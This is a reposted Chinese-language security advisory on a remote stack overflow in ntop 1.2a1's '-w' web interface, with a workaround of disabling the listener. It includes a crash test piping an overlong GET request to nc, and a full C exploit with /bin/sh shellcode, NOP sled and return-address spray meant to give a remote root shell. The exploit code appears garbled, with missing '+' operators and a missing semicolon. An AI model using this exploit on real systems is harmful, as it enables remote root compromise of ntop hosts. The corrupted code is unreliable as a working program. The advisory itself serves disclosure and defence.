ntop -w 参数远程溢出漏洞

2008-04-09 04:28:15来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

ntop -w 参数远程溢出漏洞

发布日期:2000-10-26
更新日期:2000-10-26

受影响系统:

ntop 1.2a1
- Redhat Linux 6.x
描述:

ntop是一个用来监视和分析unix系统网络使用状况的工具,如果使用"-w"参数启
动ntop,它会提供一个web接口,允许通过web远程访问它。

当提供一个超常的文件名给正在监听的ntop时,将导致ntop发生堆栈溢出,攻击
者可能远程得到超级用户权限。


<* 来源: JW Oh (mat@IVNTECH.COM) *>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


按照下列步骤可以测试是否您的ntop是有问题的:

1. $ ntop -w 8080

2. $ printf "GET /`perl -e 'print "A"x240'`\r\n\r\n" |nc localhost 8080

3. ntop会发生段访问错误:

$ ntop -w 8080
ntop v.1.2a1 MT [i686-pc-linux-gnu] listening on eth0.
Copyright 1998-99 by Luca Deri <deri@unipi.it>
Warning: unable to read file '.ntop'. No security will be used!
Waiting for HTTP connections on port 8080...
Segmentation fault

4. 下面是JW Oh提供的测试代码:

----------------------ntop-w-exp.c-----start-----------------------
#include <stdio.h>
#include <string.h>


char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

void usage()
{
printf("NTOP ntop-1.2a1 -w mode command execution exploit.\n");
printf(" mat@hacksware.com\n")
exit(0);
}

void main( int argc, char *argv[] )
{
int i,offset=-24;
#define CODE_LEN 240
#define NOP_LEN 50
char code_buf[CODE_LEN];
unsigned long esp=0xbedffb00;

if(argc >= 2) offset = atoi(argv[1]);

memset(code_buf,0x90,NOP_LEN); //insert NOP CODES
memcpy(code_buf NOP_LEN, shellcode, strlen(shellcode));
for(i=strlen(shellcode) NOP_LEN;i<=CODE_LEN;i =4)
*(long *)&code_buf[i]=(unsigned long)esp-offset;

printf("GET /");
for(i=0;i<CODE_LEN; i )
{
putchar(code_buf[i]);
}
printf("\r\n\r\n");
}
-------------------------ntop-w-exp.c----end--------------------------

建议:

临时解决方法:

NSFOCUS建议您在没有升级程序或安装补丁之前暂时停止使用ntop -w监听端口。

厂商补丁:

暂无.


标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:ntop -i 参数本地缓冲区溢出漏洞

下一篇:X11R6 xlock